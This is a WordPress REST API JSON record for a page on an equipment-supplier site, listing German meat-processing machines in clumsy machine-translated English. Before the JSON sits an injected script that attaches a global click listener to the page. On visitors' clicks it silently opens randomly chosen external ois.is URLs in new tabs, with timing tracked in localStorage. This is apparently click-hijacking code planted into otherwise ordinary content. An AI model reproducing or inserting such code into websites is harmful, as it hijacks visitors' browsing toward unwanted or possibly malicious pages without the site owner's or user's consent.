<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":344,"date":"2017-08-01T17:23:22","date_gmt":"2017-08-01T12:53:22","guid":{"rendered":"http:\/\/saeed-moshaver.com\/en\/?page_id=344"},"modified":"2017-08-01T17:24:09","modified_gmt":"2017-08-01T12:54:09","slug":"kolbe","status":"publish","type":"page","link":"http:\/\/saeed-moshaver.com\/en\/kolbe\/","title":{"rendered":"KOLBE"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<div class=\"wpb_text_column wpb_content_element \">\n<div class=\"wpb_wrapper\">\n<p><strong><span id=\"result_box\" class=\"short_text\" lang=\"en\"><span class=\"\">4-KOLBE BUILDING GERMANY<\/span><\/span><\/strong><\/p>\n<ul>\n<li><span id=\"result_box\" class=\"\" lang=\"en\">The production line and the pressing of minced meat with a press capacity of 1000 grams<\/span><\/li>\n<li><span id=\"result_box\" class=\"\" lang=\"en\">All kinds of meat grills below zero and above zero<\/span><\/li>\n<li><span id=\"result_box\" class=\"\" lang=\"en\">Grill and ask for meat<\/span><\/li>\n<li><span id=\"result_box\" class=\"\" lang=\"en\"><span class=\"\">Types of killing kits sometimes<\/span><\/span><\/li>\n<\/ul>\n<p><span id=\"result_box\" class=\"short_text\" lang=\"en\"><span class=\"\">Click for <a href=\"http:\/\/Kolbe-foodtec.com\">more info \u2026.<\/a><\/span><\/span><\/p>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" class=\"size-thumbnail wp-image-198 aligncenter\" src=\"http:\/\/saeed-moshaver.com\/wp-content\/uploads\/2017\/07\/koble-150x65.gif\" alt=\"\" width=\"150\" height=\"65\" \/>[\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;188&#8243; img_size=&#8221;300*300&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_border&#8221; border_color=&#8221;black&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;top-to-bottom&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;187&#8243; img_size=&#8221;300*300&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_border&#8221; border_color=&#8221;black&#8221; onclick=&#8221;link_image&#8221; css_animation=&#8221;top-to-bottom&#8221;][\/vc_column_inner][\/vc_row_inner][\/vc_column][vc_column width=&#8221;1\/4&#8243;][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column width=&#8221;1\/4&#8243;][\/vc_column][vc_column width=&#8221;1\/2&#8243;][vc_column_text] 4-KOLBE BUILDING GERMANY The production line and the pressing of minced meat with a press capacity of 1000 grams All kinds of meat grills below zero and above zero Grill and ask for meat Types of killing kits sometimes Click for more info \u2026. &nbsp; [\/vc_column_text][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;188&#8243; img_size=&#8221;300*300&#8243; alignment=&#8221;center&#8221; style=&#8221;vc_box_border&#8221; border_color=&#8221;black&#8221; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/344"}],"collection":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/comments?post=344"}],"version-history":[{"count":2,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/344\/revisions"}],"predecessor-version":[{"id":346,"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/pages\/344\/revisions\/346"}],"wp:attachment":[{"href":"http:\/\/saeed-moshaver.com\/en\/wp-json\/wp\/v2\/media?parent=344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}